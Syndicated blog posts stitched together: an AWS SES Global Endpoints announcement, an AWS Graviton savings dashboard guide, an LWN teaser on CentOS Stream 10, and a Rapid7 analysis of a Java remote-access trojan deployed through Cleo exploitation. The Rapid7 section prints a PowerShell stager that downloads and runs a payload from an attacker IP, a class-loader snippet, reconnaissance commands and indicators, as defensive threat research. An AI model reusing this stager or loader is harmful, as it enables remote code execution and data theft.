Amazon Simple Email Service (SES) recently announced Global Endpoints, a major enhancement to its email sending features. This new capability improves the availability and reliability of SES API v2 email sending workloads by automatically distributing messages, in an active/active configuration across the Primary and Secondary AWS regions. When Global Endpoints detects degradation in either the Primary or Secondary SES region, the feature automatically shifts all traffic to the healthy region, no customer intervention is needed.

Multi-Region SES Configuration Challenges

Customers face significant difficulties in correctly implementing a multi-region setup or disaster recovery setup. The process requires careful curation of systems along the failover path and ensuring high availability of these systems. Ironically, the system designed to trigger failover can itself fail when needed most. For many SES customers, the effort required to design, build test, monitor and maintain a two-region SES system outweighs the benefits.

SES Global Endpoints eliminates the need for these complex, custom workarounds. The feature provides a straightforward solution for maintaining email sending during unexpected regional disruptions. Global Endpoints’ built-in safeguards ensure email infrastructure remains resilient when it matters most. Please note that at launch, Global Endpoints does not support SMTP or VPC endpoint access.

SES Global Endpoints: Key Technological Components

Global Endpoints utilizes four new SES components that work together to provide a seamless and reliable multi-region email sending experience:

  1. Multi-Region Endpoint (MREP) is a new type of SES endpoint that automatically distributes email traffic across two AWS regions.
  2. Deterministic Easy DKIM Identities (DEED) makes it easy to setup multi-region identities without having to make any DNS changes.
    1. Read the blog introducing SES DEED for more information.
  3. Updated AWS SES Console Tool walks you through the process and simplifies the duplication of Domain Identities, Configuration sets, and Sending limits across regions.
  4. Readiness Checks in the SES console verify uniformity between configurations of key resources in both the Parent and Secondary SES regions.

How SES Global Endpoints work

GE-MREP-healthy

Figure 1 – SES Global Endpoints with two healthy regions.

Global Endpoints are resources that distribute your SES outbound workloads across two AWS Regions. When you set up Global Endpoints, you select a Primary Region (where the actual Endpoint is created) and a Secondary Region. When configured, a new Global Endpoints resource, called “multi-region endpoint” (MREP) is created and managed. Developers will need to update their SES v2 API enabled applications and services to use their unique MREP as the entry point to SES for their email sending requests.

The Global Endpoints configuration requires that your sending domain identity(s) is verified in both the Primary and Secondary regions. SES Global Endpoints uses DEED to simplify this process. DEED is a new feature that generates consistent DKIM tokens across all AWS Regions based on a Parent Domain Identity that is configured with Easy DKIM. This consistency allows SES to automatically verify a domain identity in the Secondary region once it’s verified in the Primary region, without requiring additional DNS record updates. Customers do not need to make any additional changes other than activating the DEED identity type. When customers expand their sending workload’s geographic footprint, or reconfigure their Global Endpoints settings in the future, their DEED identities will continue to be available and managed automatically. You can learn more about DEED from this post.

Global Endpoints works alongside other SES services, such as Virtual Deliverability Manager (VDM). Once Global Endpoints are enabled, you’ll continue to see per-region data on email sending performance in VDM. If you’ve configured event destinations like CloudWatch, SNS, or Firehose, you can make use of those same monitoring and alerting tools in your second region as soon as you’re ready. As noted below, although Configuration Sets are automatically duplicated in the Secondary region, you must manually duplicate your SES event destinations in those Configuration Sets.

It is important to understand that Global Endpoints is not a failover solution for SES, it’s an active-active implementation; when no regional impairment exists, SES Global Endpoints distributes sending traffic across two AWS regions. Customers who use SES’ shared IP sending pool do not need to make any changes, Global Endpoints will utilize the SES shared IP pool in the Secondary region. Customers who use standard, dedicated IPs must manually set up equivalent number of dedicated IPs in the Secondary region. Once properly configured, Global Endpoints will keep the dedicated IPs warm in both regions as long as you use the MREP and maintain a steady sending volume.

For example, when SES’s regional health monitoring detects degradation in the Primary region (as shown in the diagram below), The MREP automatically shifts all traffic to the healthy region. This illustrates the need for matching configurations in both regions, since all traffic will be sent through a single region, in this example the Secondary region, as long as the impairment exists. When SES’s regional health monitoring detects the impaired region is back to normal, traffic is once again redistributed across both regions. Importantly, no customer intervention is needed; SES Global Endpoints automatically and dynamically monitors and manages the traffic distribution via the MREP.

GE-MREP-impaired

Figure 2 – SES Global Endpoints with one impaired region.

The key benefits of using Global Endpoints include:

  • Simplified multi-region configuration
  • Automatic routing between two regions with no delay
  • More resilient email sending

Global Endpoints: Setup and Use

Using the SES Console, the Global Endpoint setup process assists in duplicating the key artifacts and sending limits from your Primary Region to your Secondary Region. This process ensures that both regions have equivalent verified identities, configuration sets, and approved sending limits sufficient for all of the expected volume. Customers can manually duplicate these key artifacts using the SES v2API or CloudFormation, but we recommend using the SES console because these steps are simplified.

Once the Global Endpoint is ready, key resources duplicated and the application or service has been updated to use the new MREP, SES Global Endpoints automatically routes your outbound traffic evenly between your primary and secondary regions using the multi-region endpoint (MREP). If the MREP detects degraded performance in the Primary or Secondary region, it will automatically route all SES traffic to the healthy region until the impairment is resolved.

Preparing the Parent Region

The high-level steps to setup Global Endpoints using the SES Console are below.  Note – you must already have a primary SES region fully operational with at least 1 fully verified sending identity with production access before setting up Global Endpoints.

Create Global Endpoint

  1. Open the SES console in the Primary AWS region.
  2. In the navigation pane, choose Global Endpoints.
  3. Choose Create Global Endpoint.
  4. Select a Secondary Region from the dropdown menu. (Your Primary Region defaults to the region to which you signed into the console)
  5. Review the configuration and choose Create.

The creation process may take a few seconds. Once completed, the status of your Global Endpoint will change to “Ready.”

Global Endpoints "ready" status

Preparing the secondary region

Once your Global Endpoint is ready, you must now ensure that the your email sending configuration, including all its components (Domain Identities, Configuration sets, email templates, and sending limits), is consistent across the primary and secondary regions before utilizing the Global endpoint for sending emails. This alignment is crucial to avoid potential issues and ensure proper email delivery and tracking.

The new Region duplication feature in the SES console assists you by automatically duplicating resources and duplicating account-level settings from the primary to the secondary region, ensuring that both regions have equivalent configurations.

The high-level steps to setup the secondary region for use with Global Endpoints using the SES Console are below. If you’d like to use the AWS CLI to manually duplicate these resources, consult with the SES v2 API documentation.

Duplicating verified domain identities

Next you’ll use the Duplicate verified domain identities feature in the SES console to create one or more domain identities in the Secondary Region. SES will then use DEED to verify the domain identities in the Secondary Region. Note that DEED can only be used if the Primary Domain Identity is already configured with Easy DKIM. Domain identities that are verified with BYODKIM will need to be created manually in the Secondary Region, as DEED is not applicable in this case.

Important – It’s crucial that both Primary and Secondary Regions have the equivalent verified identities and configuration sets that you intend to send email with, along with matching sending limits to ensure proper functionality of the Global endpoint. Any discrepancies could cause delivery failures, diminished failover reliability, and missing metrics.

To duplicate identities from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. Under the Region duplication tab, choose Duplicate identities.
  3. Select the identities you want to duplicate followed by Confirm.

To duplicate configuration sets from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. From the Region duplication tab, choose Duplicate configuration sets.
  3. Select the configuration sets you want to duplicate followed by Confirm.

Important Notes:

  • When duplicating configuration sets across regions, Event destinations and Reputation settings require manual reconfiguration in the Secondary Region to match the Primary Region’s setup. Since SES event destinations are region-specific, you’ll need to manually recreate these configurations in each region. For cross-regional monitoring and event routing, you can refer to additional AWS documentation for services like CloudWatch (cross-region dashboards), SNS (cross-region message delivery), and EventBridge (cross-region event routing) to develop a comprehensive multi-region event strategy.
  • If you are using SES email template resources, those templates need to be manually duplicated into the Secondary Region (the console is currently unable to perform this action).
  • You must manually synchronize any changes made to the Parent Region’s configuration sets to the Secondary Region to maintain sending integrity. This includes adding or removing standard dedicated IPs to both regions to ensure either region has the required IPs to manage the expected throughput in the case of a regional event or impairment.

The Duplicate production limits feature allows you to:

  • Check if production limits are aligned between primary and secondary regions
  • Request a limit increase in the secondary region if needed

To duplicate production limits from the SES console:

  1. On the Global endpoints page, choose the Global endpoint you want to duplicate by selecting it from the Name column.
  2. From the Region duplication tab, verify the status in the Duplicate production limits card. If the status displays Sending limits not aligned, choose Duplicate production limits.
  3. The Service Quotas page opens in the secondary region where you can request increases to “Sending quota” and “Sending rate” to match the values from the primary region.

Note – SES checks if sending limits are aligned between regions and allows you to request limit increases in the secondary region if needed. We recommend that you request the maximum quota you’re eligible for in both regions. While email traffic is distributed amongst both regions under normal operating conditions, during a failover event, the full volume of email traffic will be sent to one region and its limits should be enough to handle the full volume load.

If any manual steps are required to complete the Global Endpoint creation, they will be shown in the SES Console:

manual steps warning

When the Global Endpoint is fully configured, a MREP will be created with an Endpoint ID (see below). You will use this new endpoint ID when re-configuring your SendEmail and SendBulkEmail API calls. (note – Global Endpoints MREP are only supported by SES APIv2. The feature is not available using SMTP or VPC endpoints).

Now you’re ready to send your first email through SES Global Endpoints and your MREP!

Once you’ve obtained the Endpoint ID of your Global endpoint (this is the MREP), you should update your applications’ SendEmail or SendBulkEmail API calls to include the Endpoint ID value for the -endpoint-id parameter.

Here’s an example of how to specify the Endpoint ID in a SendEmail API call using the AWS CLI (modify the from & to email addresses and the --endpoint-id accordingly):

aws sesv2 send-email \
--from-email-address "[[email protected]](mailto:[email protected])" \
--destination "ToAddresses=[[email protected]](mailto:[email protected])" \
--content "Subject={Data=Test
email,Charset=UTF-8},Body={Text={Data=This is a test email sent using Amazon SES
Global endpoints.,Charset=UTF-8}}" \
--endpoint-id "abcdef12.g3h"

The Global Endpoints console page provides summary observability metrics on the combined workload and a unified view of your email sending volume across both the primary and secondary regions. You can access these metrics through the Cross-region metrics tab on the Global endpoint details page in the SES console..

Conclusion

By using a SES Global Endpoint in their SES API v2 applications and services, SES customers benefit from uninterrupted email delivery during regional service issues. SES Global Endpoints automatically distributes sending workloads across two AWS Regions, significantly enhancing resilience against regional outages. The Global Endpoints feature maintains warmed-up dedicated IP addresses in both regions, when used, and automatically shifts traffic to the healthy region when the other is impaired, without requiring customer intervention. SES Global Endpoints eliminates the pain points typically associated with manually-built, multi-region SES sending systems.

Global Endpoint’s console tools provide quick and easy setup and includes readiness checks to identify and mitigate potential misconfigurations. These enhancements simplify the configuration and management process, making it easier for customers to maintain a robust email sending infrastructure.

Overall, SES Global Endpoints addresses customer needs for a more reliable and easily managed email sending system, automating critical processes and providing robust tools for setup and maintenance. This significant improvement to the email sending experience is expected to benefit AWS customers across various industries and use cases.

Call to Action

Get started with SES Global Endpoints today to enhance your email sending resilience!

  • Visit the AWS Console to enable this feature for your account
  • Review the comprehensive documentation for step-by-step guidance.
  • For personalized assistance, don’t hesitate to contact AWS Support or your AWS account team.

Elevate your email infrastructure now to ensure uninterrupted communication with your customers, even in the face of regional disruptions.

Accelerate your AWS Graviton adoption with the AWS Graviton Savings Dashboard

Post Syndicated from aostan original https://aws.amazon.com/blogs/compute/accelerate-your-aws-graviton-adoption-with-the-aws-graviton-savings-dashboard/

This post is written by Rajani Guptan, Rosa Corley and Shankar Gopalan.

Are you looking to optimize your AWS infrastructure costs while maintaining high performance? AWS Graviton is a custom-built CPU developed by Amazon Web Services (AWS), and it is designed to deliver the best price performance for a broad range of cloud workloads running on Amazon Elastic Compute Cloud (Amazon EC2). Graviton-based instances provide up to 40% better price performance while using up to 60% less energy than comparable EC2 instances.

AWS users recognize that migrating existing workloads to Graviton-based instances results in better price performance. However, migrating to Graviton necessitates identifying comparable instance types, understanding the performance impacts, and estimating the savings opportunities. Furthermore, prioritizing and tracking migration efforts at scale across a diverse set of services such as Amazon EC2, Amazon Relational Database Service (Amazon RDS), Amazon ElastiCache, and Amazon OpenSearch can be challenging. Therefore, AWS has developed the AWS Graviton Savings Dashboard to help users address these complexities and accelerate their Graviton migration.

In this post, we walk you through the dashboard architecture, deployment steps, features, and capabilities. Whether you are an Executive, FinOps Practitioner, Product Owner, or in Engineering, you can use the dashboard to get the following:

  • Centralized visibility across accounts/workloads: The dashboard consolidates and tracks Graviton adoption across multiple management accounts, member accounts, and AWS Regions in a single view.
  • Graviton support across key AWS services: There are dedicated tabs allowing users to review current Graviton usage and potential savings across AWS compute and managed services.
  • Granular resource-level visibility for managed services: The dashboard provides granular resource level visibility for managed services such as Amazon RDS, ElastiCache, and OpenSearch.
  • Accurate savings and unit cost estimations: The dashboard provides accurate cost estimations for existing and comparable Graviton-based instance types by using the existing AWS Cost and Usage Report (CUR) data with the AWS public pricing API.
  • Categorization of migration effort: The dashboard categorizes Graviton migration opportunities into two main groups: Typically Easy and Requires Additional Planning, for EC2 instances. It also identifies Graviton-eligible resources for managed services, which may need version or database upgrades. This categorization helps users prioritize their engineering efforts for migration.

Architecture overview

The solution integrates AWS CUR, the AWS SDK, and AWS Public pricing API to generate comprehensive data on the usage, cost, and resource inventory. This data is stored in Amazon S3 and analyzed using Amazon Athena, providing deep insights into potential cost savings. Then, the results are visualized through Amazon QuickSight, enabling stakeholders to collaborate effectively and make informed, data-driven decisions, as shown in the following figure.

Graviton Savings Dashboard architecture diagram

Figure 1: Graviton Savings Dashboard architecture diagram

Although the solution typically costs between $50–$100 per month, the potential return on investment is substantial. The dashboard often identifies measurable cost savings that significantly outweigh its operational expenses. Moreover, it offers additional productivity benefits by streamlining the process of adopting Graviton, saving valuable time and effort for your team. For a detailed breakdown of the dashboard’s cost structure, we invite you to explore our comprehensive Graviton Savings Dashboard Cost Breakdown guide.

Deployment

The Graviton Savings Dashboard is part of the Cloud Intelligence Dashboards framework. You can deploy it using AWS CloudFormation Templates and a ‘cid-cmd’ command line tool. Prior to deploying the dashboard, make sure that you’ve met the prerequisites. These include the following:

  1. Setting up your AWS CUR: We highly recommend that you complete Steps 1 and 2 from the Cloud Intelligence Dashboard Deployment Guide. This makes sure that your CUR is set up with settings that allow for easy installation and troubleshooting if necessary.
  2. Setting up the Inventory Collector Module of the Optimization Data Collection lab: This provides automation to collect metadata and pricing for Amazon RDS, ElastiCache, and OpenSearch for all accounts in your AWS Organizations and AWS Regions.
  3. Preparing QuickSight: If you’re an existing QuickSight user, then you can skip this step. If not, then you must complete Step 3.1 to Prepare QuickSight.

When the prerequisites are in place, you can deploy the dashboard by running three simple commands (shown as follows) using a terminal application with permissions to run API requests in your AWS account.

python3 -m ensurepip --upgrade

pip3 install --upgrade cid-cmd

cid-cmd deploy --dashboard-id graviton-savings

For detailed instructions about the deployment and prerequisites, refer to the AWS Well-Architected Cost Optimization lab.

Examining the results: unlocking insights from your Graviton Savings Dashboard

Now that you’ve successfully deployed the dashboard, we can explore its powerful features and uncover valuable insights. As you read through this section, we encourage you to interact with your dashboard to familiarize yourself with the dashboard’s intuitive interface and functionality.

The Graviton Savings Dashboard is organized into service-specific tabs, each containing two key sections:

Current Graviton Usage and Savings (top section): This section highlights the tangible benefits you’ve already achieved by migrating workloads to Graviton. You can explore the following:

    • Monthly Graviton adoption trends
    • Usage distribution across different accounts, Regions, and processor types
    • Popular Graviton instance families
    • Unit cost trends
    • Realized Graviton savings

These metrics are calculated by comparing your Graviton usage to comparable non-Graviton instances, which provides a clear picture of your cost optimization efforts, as shown in the following figure.

Current Amazon EC2 Graviton Usage and Savings

Figure 2: Current Amazon EC2 Graviton Usage and Savings

Potential Graviton Savings Opportunities (bottom section): This section identifies areas where you can further optimize costs by adopting Graviton instances. It provides the following:

  • Actionable migration insights
  • Estimated implementation effort
  • Potential savings breakdowns by account, instance family/type, OS, and purchase option

These insights compare potential Graviton savings across various attributes, enabling targeted decision-making for future Graviton migrations and cost optimizations, as shown in the following figure.

Amazon EC2 Graviton Opportunity

Figure 3: Amazon EC2 Graviton Opportunity

Using dashboard insights: a FinOps team use case

In this section we explore a use case where you, as the lead of the Cloud Center of Excellence Team, use the insights from this dashboard to address concerns raised by your Chief Technology Officer (CTO).

Your CTO at your company approaches you with the following questions:

  1. Is our organization using the price-performance benefits of Graviton-based EC2 instances?
  2. How does our Graviton usage and spend and savings compare to other processor types within our overall EC2 compute spend?

Step 1: Initial analysis

You begin generating summary reports from the Current Graviton Usage (Figure 2) and Graviton Opportunity (Figure 3) sections of the dashboard. After reviewing these reports, the CTO asks you to engage with the Engineering team to evaluate potential opportunities for increasing Graviton coverage.

Step 2: Engaging with Engineering on Graviton Migration

When presenting the summary reports to the engineering manager, they expressed interest in understanding the effort level required for this project. This information can help them allocate resources and prioritize workloads, thus identifying what can be started in the short-term and what needs additional planning.

Step 3: Detailed analysis

As shown in the following figure, the Engineering team can focus on identifying candidate workloads with the most significant savings impact by segmenting the dashboard data by:

  • Implementation efforts
  • Linked accounts
  • Regions
  • Instance types
  • Operating systems

Amazon EC2 Graviton opportunity breakdown

Figure 4: Amazon EC2 Graviton opportunity breakdown

Furthermore, the team can use the dashboard to determine comparable Graviton-based instances for migration and their potential savings, as shown in the following figure.

Potential graviton Savings Details

Figure 5: Potential graviton Savings Details

Step 4: Tracking progress

Over time, the FinOps team and Engineering team can showcase the Graviton migration successes by highlighting the increasing Graviton coverage and realized savings using the dashboard’s charts (Figure 2).

Broader application:

Although this post primarily focuses on EC2 instance migration, the dashboard also provides similar insights for AWS managed services such as Amazon RDS, ElastiCache, and OpenSearch. Individual tabs with visualizations guide your Graviton adoption across these services, as shown in the following figure.

Potential graviton savings details

Figure 6: Graviton Savings Dashboard

As demonstrated by this use case, the Graviton Savings Dashboard enables various stakeholders in an organization to collaborate effectively, which leads to efficient outcomes and potential cost savings.

Conclusion

In summary, we showed how the Graviton Savings Dashboard provides clear insights into suitable workloads for Graviton migration, offers easy-to-understand visualizations for monitoring adoption, and automates resource matching and savings calculations. Streamlining the process of identifying and implementing cost-saving opportunities with Graviton-based instances means that the dashboard enables more informed decision-making about your AWS infrastructure. To learn more and get started with the Graviton Savings Dashboard, visit the Graviton Savings Dashboard page and take the first step toward more efficient and cost-effective cloud computing.

[$] A look at CentOS Stream 10

Post Syndicated from jzb original https://lwn.net/Articles/986792/

The Red
Hat Enterprise Linux (RHEL) 10 beta
was released in mid-November
and, if all goes according to plan, CentOS Stream 10
should be released before the end of the year. While nothing is etched
in stone just yet, it is a good time for anyone using or targeting
RHEL (and its clones) to start taking a look at how Stream 10,
and the corresponding EPEL
repository, is shaping up. This is not only important to RHEL and
Stream users, but anyone deploying and supporting software on
enterprise Linux (EL) derivatives like AlmaLinux, Oracle Linux,
and Rocky Linux as well.

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

Post Syndicated from Christiaan Beek original https://blog.rapid7.com/2024/12/11/etr-modular-java-backdoor-dropped-in-cleo-exploitation-campaign/

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

Many thanks to Rapid7 MDR and incident response teams for their contributions to this analysis.

While investigating incidents related to Cleo software exploitation, Rapid7 Labs and MDR observed a novel, multi-stage attack that deploys an encoded Java Archive (JAR) payload. Our investigation revealed that the JAR file was part of a modular, Java-based Remote Access Trojan (RAT) system. This RAT facilitated system reconnaissance, file exfiltration, command execution, and encrypted communication with the attacker’s command-and-control (C2) server. Its modular architecture includes components for dynamic decryption, network management, and staged data transfer.

It’s worthwhile to note that this isn’t necessarily the only payload that has or will be deployed in attacks targeting Cleo software — it’s entirely possible an alternate payload could be leveraged. This underscores the importance of timely detection and response capabilities, as well as the critical role of monitoring assets that may be impacted by unknown zero-day threats.

At a high level, the attack flow can be visualized like so:

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

As Huntress pointed out in their blog on this threat campaign, part of the attack chain involves uploading and executing an XML file as part of a ZIP. When analyzing the XML file that contains the PowerShell code, we looked at the code to understand how the code would trigger in line with the known CVE (CVE-2024-50623) and the new CVE (still pending) for the unauthenticated malicious hosts vulnerability in Cleo software.

The XML snippet appears to define a “Host” and “Mailbox” configuration in Cleo Integration Suite (e.g., Harmony, VLTrader, or LexiCom). Cleo software often uses XML-based configuration files for trading partner setups, hosts, mailboxes, and scheduled actions or commands. Each <Host> element represents a communication endpoint, and each <Mailbox> often represents a sub-endpoint or logical folder.

The <Action> elements define which tasks (commands, scripts, or transfers) should be performed. Looking at the code of our XML, we observed a suspicious element.

Under <Mailbox> there is an <Action> element with actiontype=”Commands”. Inside this action, there’s a <Commands> tag that runs:

SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand <base64_data>" > webserver/temp/webserver-<GUID>.swp

The <Commands> directive is invoking cmd.exe which runs PowerShell with an encoded command. The command is outputting to a .swp file, possibly to hide or store results locally.

By embedding this script within the <Action> element of the XML, if the CLEO system imports this configuration and executes the defined action by combining the vulnerability mentioned in CVE-2024-50623, the malicious code will run on the server. This could completely compromise the system running CLEO, given that CLEO often runs with significant privileges and access to internal systems and file shares.

Analyzing the malicious PowerShell script content

The script in question was originally invoked as remote code execution (RCE) during suspected CVE-2024-50623 exploitation:

powershell -NonInteractive -EncodedCommand <base64_string>

This is a common technique used by attackers to obfuscate their malicious code. Decoding the Base64 string reveals a PowerShell snippet that:

  1. Establishes a TCP connection to a suspicious external host (185.181.230.103) on port 443. (See additional external host indicators in the IOCs section.)
  2. Retrieves and decrypts data from the remote server using a custom XOR-based routine.
  3. Writes the decrypted output as a JAR file named cleo.2853.
  4. Executes the malicious JAR using the embedded Java runtime of Cleo LexiCom (jre\bin\java.exe -jar cleo.2853).

Step-by-step analysis

  1. Network connection setup
    The script begins by creating a Net.Sockets.TcpClient object and connecting it to the remote server:

$c = New-Object Net.Sockets.TcpClient("185.181.230.103", 443)
$s = $c.GetStream()
$s.ReadTimeout = 10000
$w = New-Object System.IO.StreamWriter $s

A StreamWriter $w is then created, allowing the script to send initial data to the server. The malware sends the “TLS v3 <string.>” and processes the response. This serves as a form of handshake or protocol initialization.

2. XOR decryption setup
Before reading any payload from the server, the script sets up key variables for decrypting data:

$k = 112,171,142,211,15,25,18,201,93,185,21,234,208,30,189,187
$a = New-Object System.Byte[] 9999
$f = "cleo.2853"
$t = New-Object IO.FileStream($f, [IO.FileMode]::Create)
$n = $g = 0

  • $k is an array of 16 bytes used as part of the XOR encryption key.
  • $a is a large buffer (9999 bytes) to hold data read from the stream.
  • $f is the output file that will eventually contain the decrypted payload.
  • $t is a file stream for writing data to disk.

3. Reading and decrypting the payload
The script enters a loop, reading chunks of data and decrypting each byte with a custom XOR routine:

while(1){
    $r = $s.Read($a,0,9999)
    if($r -le 0){break}
    for($i=0;$i -lt $r;$i++){
        $j = $n++ -band 15
        $a[$i] = $a[$i] -bxor $k[$j] -bxor $g
        $g = ($g + $a[$i]) -band 255
        $k[$j] = ($k[$j] + 3) -band 255
    }
    $t.Write($a,0,$r)
}

This code does several things:

  • It continuously reads data from the remote server into $a.
  • For each byte, it calculates an index $j into $k (cycling through the key bytes).
  • It XORs the received byte with $k[$j] and a running state variable $g.
  • $g and $k[$j] evolve dynamically, meaning the key changes with every byte processed, making static detection harder.
  • Decrypted bytes are then written directly into the file cleo.2853.

The number behind the “cleo.*” differs in the cases we observed. By the end of this loop, the attacker’s encrypted payload is stored locally as a decrypted file.

4. Final steps: Executing the malicious JAR
After fetching and decrypting the data, the script closes all streams and sets some environment variables:

$t.Close()
$w.Close()
$s.Close()

$env:QUERY="...185.181.230.103;135.237.120.41;"
$env:F=$f

The $env:QUERY variable appears to include additional IP addresses and contains the AES key used to decrypt the next stage and the string to send to the C2 server to receive the next payload. Finally, the script runs the malicious JAR file:

Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"

This leverages the Cleo environment’s embedded Java runtime. Since Cleo’s file transfer products come bundled with their own Java environment, the attackers don’t need to rely on a system-wide installation — they can simply run their malicious JAR directly. In one of our IR cases, the “cleo.xxxx” file was written to the C:\VLTrader\ directory.

Inside the JAR file
The core functionality revolves around a custom class loader named “start”.

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

Instead of loading classes from the file system, this loader accepts a byte array representing a compressed archive of class files. It then extracts each entry and stores them in a map, ready to be defined as Java classes on demand.

What does this custom class loader do?

  1. Extracts classes from a byte array: The constructor of the start class takes a byte array (like a JAR) and reads the class using a ZipInputStream. Each entry is unpacked and stored in a map keyed by the entry name. For example:

ZipInputStream zis = new ZipInputStream(new ByteArrayInputStream(byteArray));
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
    ByteArrayOutputStream bos = new ByteArrayOutputStream();
    int read;
    while ((read = zis.read(buffer)) > 0) {
        bos.write(buffer, 0, read);
    }
    cs.put(entry.getName(), bos.toByteArray());
}
Defining Classes at Runtime: Later, when a class is requested, the findClass method checks the map. If found, it uses defineClass to load that class directly from the in-memory bytes:
if (cs.containsKey(className)) {
    byte[] classData = (byte[]) cs.get(className);
    return defineClass(className, classData, 0, classData.length);

2. Fetches and decrypts class data remotely. The main method doesn’t just run local code — it also does the following:

  • Reads configuration and keys from environment variables.
  • Connects to a remote host over port 443 and sends a “TLS v3” handshake-like message.
  • Receives encrypted data, which it then decrypts using AES keys derived from the environment-provided values.
  • Once decrypted, this data is treated like a JAR file, passed into a new start instance, and thus new classes are loaded at runtime.

3. Executes a specific class (Cli): With the new classes loaded, the code uses reflection to instantiate a particular class named “Cli” and invoke its constructor.

This mechanism allows the JAR to remain small and stealthy, as it doesn’t contain all its logic up front. Instead, it fetches critical code at runtime, decrypts it, and executes it dynamically. But it didn’t stop here — after executing this first JAR file, which acts as a loader, it downloads a zip file that contains multiple JAR files:

File name MD5
Cli fa0ffca3597af31fc196ca27283aa038
Dwn 510a7fa9d425f1c3a38ad81d813b3f17
DwnLevel 7dcaffc9c26fe9e08e9b66e05c644cfc
Mos ee7acd7a8a5795308942f094c950de6f
Proc 37a761f4d02577cf6789676f87cb9fc6
ScSlot 6ff85e7bec211869073b969dbd10c8eb
SFile ca3de6f055f94acc87c6d335d9cc5c04
Slot d924ffd1f2952a03da29c0a7a33e6a54
SrvSlot bcc1bf75e0be3efabbd616cc8cfa8c35

Overall this is how the modules work together and what their function is:

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

The Cli class appears to be a key component of a remote backdoor mechanism. On startup, it determines the operating system and sets flags accordingly before attempting to connect to a remote host over port 443 using Java’s non-blocking I/O. Once connected, it can manage data streams via asynchronous event loops, handle received data, and potentially issue commands. After initialization, the code instructs the system to delete its own initial file to remove evidence of its presence.

In Rapid7 MDR investigations into exploitation of Cleo software, we observed commands being executed that we would categorize as reconnaissance attempts.

The DWN class appears to facilitate the packaging and transmission of files from the local system to a remote server. It assembles files (and directories) into a ZIP archive on the fly, splitting them into multiple ZIP chunks if they exceed a certain size threshold. Using a SrvSlot reference, it sends compressed file data over a network channel, carefully managing buffers and limiting throughput to avoid overwhelming the connection. The code iterates through directories, queues files, and processes them incrementally, updating statistics and retrying if conditions are not ideal. Through this mechanism, this class effectively automates and streamlines the mass transfer of local files, hinting at a data exfiltration or remote backup process. It’s designed to run quietly in the background, handle large file sets, and provide periodic progress updates to its server counterpart.

The DwnLevel class is a simple helper structure that represents a single level in a file traversal hierarchy. It holds an array of file objects, along with an index and a state variable to track the current processing position. As the Dwn class iterates through directories, the DwnLevel Java class instance keeps track of which files have been processed and which remain, helping the file packaging and transfer process proceed smoothly through potentially nested directories.

The Mos class acts as a custom output stream for sending ZIP data through Dwn. Instead of writing to disk, it buffers data in memory, attaches metadata like the job ID and packet offsets, and then hands the chunks off to Dwn to send out. This setup allows code that writes ZIP entries to operate as if it were writing to a normal output stream, while the Mos and Dwn classes handle the network transmission details behind the scenes.

Proc is a thread that runs external commands on the system, captures their output, and sends it back through SrvSlot. It can launch interactive shells, parse configuration files, and handle input given before the process starts.

In the code of this class, we also can discover that it is cross platform designed, either executing a cmd (Windows) or bash (*nix) shell:

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

ScSlot manages a network connection for a specific channel. It handles connecting, reading data, and relaying it to the SrvSlot class. If the connection fails or no data is received, it signals the server to close the channel. Its tick method processes incoming data in chunks to ensure smooth communication.

The SFile class handles file reading and writing operations. It can both read from an existing file or write to a new file, depending on the flags provided. The class tracks the file size, saved size and handles errors by setting status messages.

The Slot class manages the network connection using the Java network IO class. It handles connecting, reading, and writing, ensuring a smooth data transfer.

Last but not least, since it is a core component of this Java RAT, is the SrvSlot class. It interacts with other classes as described before and is the central node for handling encrypted communications and data transfer — it handles the ZIP transfer traffic. Besides traffic handling, a small component in the code of this class appears to be for debugging purposes (i.e., providing diagnostics and session statistics).

Overall this set of Java classes provide a modular multi-stage system (Java-RAT) designed to communicate with a C2, has file-transfer and management functionality, can execute commands and applies packet level encryption/decryption.

Indicators of compromise

Network IOCs:
67.199.229[.]140
76.9.210[.]45
89.248.172[.]139
131.226.235[.]203
176.123.10[.]115
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103

Post-exploitation behavior

In multiple attack chains, after initial exploitation, the adversary executed the following enumeration commands via cmd to gather user, group and system information from the impacted system and display domain trust relationships.

systeminfo

net group /domain

whoami

wmic logicaldisk get name,size

nltest /domain_trusts

Rapid7 also observed post-exploitation activity in the form of an "OverPass-The-Hash" attack, in which the adversary leverages the NTLM hash of an account to obtain a Kerberos ticket that can be used to access additional network resources within the impacted environment.

MITRE ATT&CK Enterprise Techniques

Initial access Exploit Public-Facing Application (T1190)
Execution Command and Scripting Interpreter (T1059)
Discovery System Owner/User Discovery (T1033)
System Information Discovery (T1082)
Domain Trust Discovery (T1482)
Permission Groups Discovery (T1069)
Lateral movement Use Alternate Authentication Material: Pass the Hash (T1550/002)